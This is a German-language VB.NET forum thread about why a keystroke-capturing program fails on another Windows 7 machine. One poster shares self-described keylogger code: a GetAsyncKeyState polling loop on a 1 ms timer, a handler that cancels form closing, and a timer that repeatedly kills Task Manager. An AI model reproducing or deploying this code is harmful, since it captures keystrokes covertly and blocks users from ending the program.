bei mir geht das Programm perfekt bei anderen garnicht Oo

  • VB.NET

Es gibt 26 Antworten in diesem Thema. Der letzte Beitrag () ist von Memo.

    bei mir geht das Programm perfekt bei anderen garnicht Oo

    Hey Leute, hab ein ganz komisches Problem...

    und zwar hab ich ein Programm geschrieben was tasten abfängt (kein Keylogger, und nichts illegales)

    Bei mir funktioniert das Programm perfekt und ruckelfrei
    aber am laptop neben an (auch WIn 7 Ultimate 64 bit)
    funktioniert es garnicht Oo?
    an was kann es liegen ??

    Bitte um Hilfe

    das Programm ist mit Mikeb69's Tutorial ([VB.NET] Tastatur Systemweit abfangen (Tastatur Hook)) geschrieben...
    hey A-Zid,
    kann sein, dass es an dem Code liegt. Also, dass der Code nur unter manchen Betriebssystemen richtig läuft. Das kenn ich nur zu gut ^^ Es kann aber auch am OS liegen.
    Schreibe mal ein anderes Programm, wenn du nicht schon eins hast, und probiere das dann auch auf dem anderen Rechner aus und schaue obs geht.

    Wenn nur das Keylogger Progg nicht läuft, dann schreib nochmal zurück. Ich kann dir den Code meines Keyloggers dann geben. Mein Keylogger läuft überall gut :)
    oh wusst ich gar ned. Dann funzt wahrscheinlich der CODE unter win7 nicht bzw. nicht richtig.
    A-Zid du kannst back schreiben oder mir ne PN schicken, ich stelle gerne meinen Keylogger-Code zur Verfügung. (Funzt auch unter Win7)
    nene :D Ich verwende meine Programme nicht zum illegalen Zwecke! Ich habe da kein "System.Net.Mail" oder sonstiges importiert und ich sende die aufgezeichneten Daten auch an nichts weiter :!: Willste meinen Code haben? Bei mir funktioniert das Progg auf allen OS.
    sein Programm beinhaltet wahrscheinlich einfach noch andere sachen...was nichts mit dem KeyboardHook direkt zu tun hat...

    aber wenn du soetwas willst, dann mach es mit einem Select Case und den Integerwerten...
    Ich wollte auch mal ne total überflüssige Signatur:
    ---Leer---
    Jo, is mit nem timer. Kannst aber trotzdem was mit meinem Code, im Timer1_Tick Event, anfangen. Schreibe ihn einfach in ein anderes Event (zB bgw).
    Gesamter Code:

    Als erstes eine Funktion

    VB.NET-Quellcode

    1. Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Integer) As Integer
    2. Public Function getkeypress() As Integer
    3. For i As Integer = 1 To 255
    4. If GetAsyncKeyState(i) = -32767 Then
    5. Return i
    6. End If
    7. Next i
    8. End Function

    Code im Form1_Load Event

    VB.NET-Quellcode

    1. Timer1.Enabled = True
    2. Timer2.Enabled = True

    Dann der Code im Timer1_Tick Event (Interval=1)

    VB.NET-Quellcode

    1. Dim key As Integer = getkeypress()
    2. If key <> 0 Then
    3. TextBox1.Text = TextBox1.Text + CStr(key)
    4. Else : End If
    5. If key <> 0 Then
    6. TextBox2.Text = TextBox2.Text + CStr(Chr(key))
    7. Else : End If

    Und zuletzt noch 2 Codes, mit denen sich die Form nicht schließen lässt

    VB.NET-Quellcode

    1. Private Sub Form1_FormClosing(ByVal sender As System.Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles MyBase.FormClosing
    2. e.Cancel = True
    3. End Sub

    VB.NET-Quellcode

    1. Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
    2. For Each Taskmgr In Process.GetProcessesByName("TaskMgr")
    3. Taskmgr.Kill()
    4. Next
    5. End Sub


    So fertig :P
    Ich habe da kein gespamme ^^ es ist kein spam bot xD Es enthält auch nicht "SendKeys.Send()". Und Interval auf 1, damit er jede tausendstel Sekunde abfragt, ob Tasten gedrückt worden sind. Und was meinst du mit:
    hmmh.. naja mit timer wirds halt ressourcen verbrauchent...
    Ressourcen verbrauchen ?(
    naja wenn 2 Timer dauerhaft laufen dann geht das schon auf die Leistung xD

    //edit:

    Quellcode

    1. Die getkeypress-Funktion gibt nicht für alle Codepfade einen Wert zurück. Fehlt eine Return-Anweisung?


    //edit:
    ddas kommt bei

    Quellcode

    1. Public Function getkeypress() As Integer
    2. For i As Integer = 1 To 255
    3. If GetAsyncKeyState(i) = -32767 Then
    4. Return i
    5. End If
    6. Next i
    7. End Function